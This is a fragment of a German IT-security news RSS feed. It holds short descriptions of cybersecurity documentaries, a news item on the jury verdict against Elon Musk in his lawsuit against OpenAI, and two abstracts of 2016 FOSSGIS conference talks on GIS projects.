</div></figure>



<p><strong>Digital Amnesia (2014)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>wirft ein Schlaglicht auf digitale Daten und den Umgang mit diesen</p></li>



<li><p>mit Beteiligung von Experten des Internet Archive</p></li>



<li><p>kostenlos in voller Länge verfügbar</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>Deep Web (2015)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>thematisiert den Darknet-Marktplatz Silk Road</p></li>



<li><p>beleuchtet dabei auch die Verhaftung und den Prozess von Gründer Ross Ulbricht</p></li>



<li><p>O-Töne von zahlreichen Beteiligten</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>A Good American (2015)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>erzählt die Geschichte des Ex-NSA-Direktors Bill Binney</p></li>



<li><p>klärt auf, wie ein Computerprogramm 9/11 hätte verhindern können</p></li>



<li><p>Regie führte der Österreicher Friedrich Moser</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>War for the Web (2015)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>wirft einen Blick auf die physische Infrastruktur hinter dem Internet</p></li>



<li><p>zeigt, wie Unternehmen und Regierungen hinter den Kulissen um die Vorherrschaft kämpfen</p></li>



<li><p>beleuchtet dabei auch Fragen wie Data Ownership, Datenschutz und Security</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>Cyber War (2016)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>zeigt, wie Regierungen im Kampf gegen kriminelle Hacker aufrüsten</p></li>



<li><p>dabei kommen auch unlautere Mittel wie Spionage zur Sprache</p></li>



<li><p>viele prominente O-Töne</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>Down the Deep Dark Web (2016)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>bietet Insider-Einblicke in das Darknet</p></li>



<li><p>beleuchtet dabei auch legitime Einsatzzwecke</p></li>



<li><p>will mit Vorurteilen und Stereotypen aufräumen</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>Zero Days (2016)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>erzählt die Geschichte des Stuxnet-Virus</p></li>



<li><p>analysiert ausgiebig die Folgen des Angriffs</p></li>



<li><p>bietet zahlreiche Insider-Einblicke und O-Töne</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>Facebook: Cracking the Code (2017)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>beleuchtet die Security-Kultur und -Probleme bei Facebook</p></li>



<li><p>geht dabei auch auf die Nutzung von User-Daten, Ad-Gebahren und Fake News ein</p></li>



<li><p>zahlreiche O-Töne von Experten</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>Kim Dotcom: Caught in the Web (2017)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>erzählt die Geschichte von Megaupload-Gründer Kim Schmitz</p></li>



<li><p>beleuchtet dabei seinen Kampf gegen die US-Regierung und die Entertainment-Branche</p></li>



<li><p>zahlreiche O-Töne von Beteiligten – auch Kim selbst</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>The Defenders (2018)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>analysiert vier schlagzeilenträchtige Cyberattacken</p></li>



<li><p>nimmt dabei die Perspektive der Verteidiger ein</p></li>



<li><p>produziert vom Sicherheitsanbieter Cybereason</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>The Great Hack (2019)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>thematisiert den Skandal um Facebook und Cambridge Analytica</p></li>



<li><p>nimmt dabei die Perspektive verschiedener Beteiligter auf</p></li>



<li><p>aufwändig produziert</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>HAK_MTL (2019)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>kanadische Hacker stellen die Datenschutz-Versprechen von Unternehmen auf die Probe</p></li>



<li><p>dabei liegt ein Fokus auf Überwachungstechnologien</p></li>



<li><p>interessante Insider-Einblicke und O-Töne</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>WannaCry: The Marcus Hutchins Story (2019)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>erzählt die Geschichte des IT-Experten, der WannaCry durch Zufall stoppte</p></li>



<li><p>und anschließend in Zusammenhang mit einem Banking-Trojaner verhaftet wurde</p></li>



<li><p>dabei kommt auch Hutchins selbst zu Wort</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>KnowBe4: The Making of a Unicorn (2020)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>erzählt die Gründungsgeschichte des Security-Unternehmens KnowBe4</p></li>



<li><p>mit Beteiligung von Chief Hacking Officer Kevin Mitnick</p></li>



<li><p>produziert vom Cybercrime Magazine</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>MY.DOOM: Earth’s Deadliest Computer Viruses (2021)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>thematisiert den Computervirus MyDoom aus dem Jahr 2004</p></li>



<li><p>analysiert dabei auch seine Auswirkungen</p></li>



<li><p>kostenlos in voller Länge verfügbar</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>Biggest Heist Ever – Der große Bitcoin-Raub (2024)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>thematisiert den Hackerangriff auf die Hong Konger Kryptobörse Bitfinex aus dem Jahr 2016</p></li>



<li><p>beleuchtet den Werdegang von Ilya Lichtenstein und Heather Morgan, die für den Angriff verurteilt wurden</p></li>



<li><p>diverse O-Töne von Ermittlern, Freunden, Betroffenen – und auch von Ilya Lichtenstein selbst </p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>Most Wanted: Teen Hacker (2025)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li>beleuchtet die Cybercrime-Karriere des finnischen Hackers Julius Kivimäki</li>



<li>enthält Interviews mit Strafverfolgungsbehörden und Opfern des Cyberkriminellen</li>



<li>auch Kivimäki selbst kommt zu Wort</li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>Joybubbles (2026)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li>erzählt die Geschichte des blinden Telefonhackers Joe Engressia aus dessen eigener Perspektive</li>



<li>ursprünglich als <a href="https://www.kickstarter.com/projects/rachaelmorrison/joybubbles-the-documentary-film" target="_blank" rel="noreferrer noopener">Kickstarter-Projekt</a> gestartet</li>



<li>erfolgreiche Premiere auf dem <a href="https://festival.sundance.org/program/film/6932fad21a5535277891b127" target="_blank" rel="noreferrer noopener">Sundance Film Festival 2026</a></li>
</ul>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Elon Musk Loses Lawsuit Against OpenAI]]></title>
<description><![CDATA[After three weeks of testimony, which was covered extensively here on Slashdot, a U.S. jury on Monday ruled against Elon Musk in his lawsuit against OpenAI, finding that he waited too long to bring his claims that the company betrayed its nonprofit mission. Reuters reports: The trial had widely b...]]></description>
<link>https://tsecurity.de/de/3527142/it-security-nachrichten/elon-musk-loses-lawsuit-against-openai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3527142/it-security-nachrichten/elon-musk-loses-lawsuit-against-openai/</guid>
<pubDate>Mon, 18 May 2026 21:08:08 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[After three weeks of testimony, which was covered extensively here on Slashdot, a U.S. jury on Monday ruled against Elon Musk in his lawsuit against OpenAI, finding that he waited too long to bring his claims that the company betrayed its nonprofit mission. Reuters reports: The trial had widely been seen as a critical moment for the future of OpenAI and artificial intelligence generally, both in how it should be used and who should benefit from it. Following the verdict, Musk's lawyer said he reserved the right to appeal, but the judge suggested he may have an uphill battle because whether the statute of limitations ran out before Musk sued was a factual issue. "There's a substantial amount of evidence to support the jury's finding, which is why I was prepared to dismiss on the spot," U.S. District Judge Yvonne Gonzalez Rogers said.
 
In his 2024 lawsuit, Musk accused OpenAI, its Chief Executive Sam Altman and its President Greg Brockman of manipulating him into giving $38 million, then going behind his back by attaching a for-profit business to its original nonprofit and accepting tens of billions of dollars from Microsoft and other investors. Musk called the OpenAI defendants' conduct "stealing a charity." OpenAI was founded by Altman, Musk and several others in 2015. Musk left its board in 2018, and OpenAI set up a for-profit business the next year. OpenAI countered that it was Musk who saw dollar signs, and that he waited too long to claim OpenAI breached its founding agreement to build safe artificial intelligence to benefit humanity. "Mr. Musk may have the Midas touch in some areas, but not in AI," William Savitt, a lawyer for OpenAI, said in his closing argument.
 
The verdict followed 11 days of testimony and arguments where Musk's and Altman's credibility came under repeated attack. Lawyers for OpenAI embraced each other after the verdict was announced. Microsoft faced an aiding and abetting claim. In a statement, a Microsoft spokesperson said, "The facts and the timeline in this case have long been clear and we welcome the jury's decision to dismiss these claims as untimely." 
Recap:

Musk Accused of 'Selective Amnesia', Altman of Lying As OpenAI Trial Nears End (Day Twelve)
OpenAI Trial Wraps Up With 'Jackass' Trophy For Challenging Musk (Day Eleven)
Sam Altman Testifies That Elon Musk Wanted Control of OpenAI (Day Ten)
Microsoft CEO Satya Nadella Testifies In OpenAI Trial (Day Nine)
Sam Altman Had a Bad Day In Court (Day Eight)
Sam Altman's Management Style Comes Under the Microscope At OpenAI Trial (Day Seven)
Brockman Rebuts Musk's Take On Startup's History, Recounts Secret Work For Tesla (Day Six) 
OpenAI President Discloses His Stake In the Company Is Worth $30 Billion (Day Five)
Musk Concludes Testimony At OpenAI Trial (Day Four)
Elon Musk Says OpenAI Betrayed Him, Clashes With Company's Attorney (Day Three) 
Musk Testifies OpenAI Was Created As Nonprofit To Counter Google (Day Two) 
Elon Musk and OpenAI CEO Sam Altman Head To Court (Day One)<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Elon+Musk+Loses+Lawsuit+Against+OpenAI%3A+https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F05%2F18%2F1845222%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F05%2F18%2F1845222%2Felon-musk-loses-lawsuit-against-openai%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://yro.slashdot.org/story/26/05/18/1845222/elon-musk-loses-lawsuit-against-openai?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[XPlanung für einen Flächennutzungsplan mit PostGIS und QGIS (fossgis2016)]]></title>
<description><![CDATA[Im Flächennutzungsplan (FNP) wird die beabsichtigte Bodennutzung des Gebietes
          einer Gemeinde dargestellt (§5 BauGB). In der Stadt Jena wurde im Jahre 2015 mit der
          Neuerstellung des FNP begonnen.
          Die Stadt hat seit mehreren Jahren das freie Desktop-GIS QGIS im Einsatz...]]></description>
<link>https://tsecurity.de/de/3527011/it-security-video/xplanung-fuer-einen-flaechennutzungsplan-mit-postgis-und-qgis-fossgis2016/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3527011/it-security-video/xplanung-fuer-einen-flaechennutzungsplan-mit-postgis-und-qgis-fossgis2016/</guid>
<pubDate>Mon, 18 May 2026 20:03:00 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Im Flächennutzungsplan (FNP) wird die beabsichtigte Bodennutzung des Gebietes
          einer Gemeinde dargestellt (§5 BauGB). In der Stadt Jena wurde im Jahre 2015 mit der
          Neuerstellung des FNP begonnen.
          Die Stadt hat seit mehreren Jahren das freie Desktop-GIS QGIS im Einsatz, als
          Datenspeicher dient eine PostgreSQL/PostGIS-Datenbank. Am Anfang stand deshalb die
          Überlegung, wie die Daten für einen FNP in einem GIS im allgemeinen und in PostGIS im
          besonderen sinnvoll modelliert werden können. Im Projekt XPlanung wird seit mehreren
          Jahren das Datenaustauschformat XPlanGML entwickelt, das den verlustfreien Austausch von
          raumbezogenen Planwerken ermöglichen soll. XPlanung wird schon seit 2008 vom Deutschen
          Städtetag und vom Deutschen Städte- und Gemeindebund zur Einführung empfohlen. Da es
          bisher jedoch keine frei verfügbare Umsetzung des XPlanungs-Standards für PostGIS gibt,
          wurde zunächst der Standard (Version 4.1) in der Datenbank implementiert. Jede Objektart
          wird dabei durch eine eigene Tabelle repräsentiert; Trigger sorgen für die Datenkonsistenz
          zwischen Eltern- und Kindklassen. Die Visualisierung und Bearbeitung der Daten erfolgt von
          QGIS aus mit einem eigenen Plugin und dem Plugin DataDrivenInputMask. Für jede
          FNP-Objektart gibt es eine Standarddarstellung in Anlehnung an die PlanZVo.
          Vorteile der dargestellten Lösung: für jeden Sonderfall gab es bisher eine sinnvolle
          Anwendung innerhalb des Standards; da XPlanung bereits alle im Zusammenhang mit einem FNP
          denkbaren Attribute enthält, war es folglich noch nicht nötig, weitere Attribute
          hinzuzufügen. Die Sachdaten lassen sich in QGIS gut editieren und eine PlanZVo-konforme
          Darstellung ist mit den Darstellungsoptionen von QGIS möglich. Als Nachteil erwies sich
          insbesondere die Tatsache, dass die Datenerfassung eine Aufgabe ist, die entsprechend
          qualifiziertes Personal und ein gewisses Verständnis des komplexen Standards voraussetzt.
          Noch gar nicht realisiert sind z.Zt. Schnittstellen, also die Übernahme von Plänen im
          XPlanGML-Format bzw. die Ausgabe eigener Pläne als XPlanGML.

Der Vortrag zeigt die erfolgte Umsetzung des Standards XPlanung für PostGIS und
          den Zugriff darauf aus QGIS heraus am Beispiel eines in der Aufstellung befindlichen
          Flächennutzungsplans.
about this event: https://fossgis-konferenz.de/2016/programm/event5071.html]]></content:encoded>
</item>
<item>
<title><![CDATA[Zusammenspiel von GIS und CMS verdeutlicht die möglichen Folgen einer 2°          Klimaerwärmung (fossgis2016)]]></title>
<description><![CDATA[Der öffentlich zugänglichen IMPACT2C Web-Atlas visualisiert die möglichen
          Auswirkungen einer 2°C Klimaerwärmung und präsentiert die Forschungsergebnisse der
          Allgemeinheit. Dazu werden Pages eines CMS (rechts ) einem Set von Karten (links) in einem
          Dual-Screen zugeord...]]></description>
<link>https://tsecurity.de/de/3527009/it-security-video/zusammenspiel-von-gis-und-cms-verdeutlicht-die-moeglichen-folgen-einer-2-klimaerwaermung-fossgis2016/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3527009/it-security-video/zusammenspiel-von-gis-und-cms-verdeutlicht-die-moeglichen-folgen-einer-2-klimaerwaermung-fossgis2016/</guid>
<pubDate>Mon, 18 May 2026 20:02:57 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Der öffentlich zugänglichen IMPACT2C Web-Atlas visualisiert die möglichen
          Auswirkungen einer 2°C Klimaerwärmung und präsentiert die Forschungsergebnisse der
          Allgemeinheit. Dazu werden Pages eines CMS (rechts ) einem Set von Karten (links) in einem
          Dual-Screen zugeordnet.
          Das Backend stellt einen eigenen Upload-Bereich zur Verfügung, um NetCDF-Files etc.
          einzustellen. Mittels Preview-Funktion kann der Benutzer direkt feststellen, ob die Daten
          richtig positioniert sind. Karten können einer Timeline zugeordnet werden, um einen
          Vergleich vor und nach einer 2°C und 3°C Klimaerwärmung zu ermöglichen. Dazu können
          parallele Darstellungen mehrerer Karten auf einem Screen genutzt werden.
          Ein GeoServer stellt die Karten bereit. In einer PostgreSQL mit PostGIS Extension sind die
          Kartenmaterialien gespeichert. Zur Visualisierung der unterschiedlichen Kartenansichten
          kommt OpenLayers3 zum Einsatz. Das CMS ist mit dem auf Python basierenden DjangoCMS
          realisiert.
          Der IMPACT2C Web-Atlas wurde 2015 gemeinsam von den Linzer Unternehmen X-Net Services GmbH
          und blp GeoServices GmbH im Auftrag des Climate Service Center Germany technisch
          umgesetzt. ForscherInnen aus 16 Nationen stellen ihre Ergebnisse und Inhalte ein und
          ergänzen diese.
          Der Vortrag beschreibt die eingesetzten Open Source Komponenten und deren Zusammenspiel
          und gibt einen Einblick über die Herausforderungen in der Entwicklung und im Betrieb des
          Web-Atlas. Ein Ausblick auf die interaktive Verbindung zwischen Chart und Map wird
          gegeben.

Die Linzer Unternehmen X-Net Services GmbH und blp GeoServices GmbH haben die
          technische Entwicklung des öffentlich zugänglichen IMPACT2C Web-Atlas im Auftrag des
          Climate Service Center Germany realisiert. Darin werden die möglichen Auswirkungen einer
          2°C Klimaerwärmung visualisiert und in einem Dual-Screen (Map und Pages) für die
          Allgemeinheit verständlich erklärt. Durch die Darstellung in mehreren Layern kann die
          Situation vor und nach einer 2°C Klimaerwärmung verglichen werden.
          Der IMPACT2C Web-Atlas wurde ausschließlich mit Open Source Komponenten realisiert.
about this event: https://fossgis-konferenz.de/2016/programm/event5055.html]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 0,34ms -->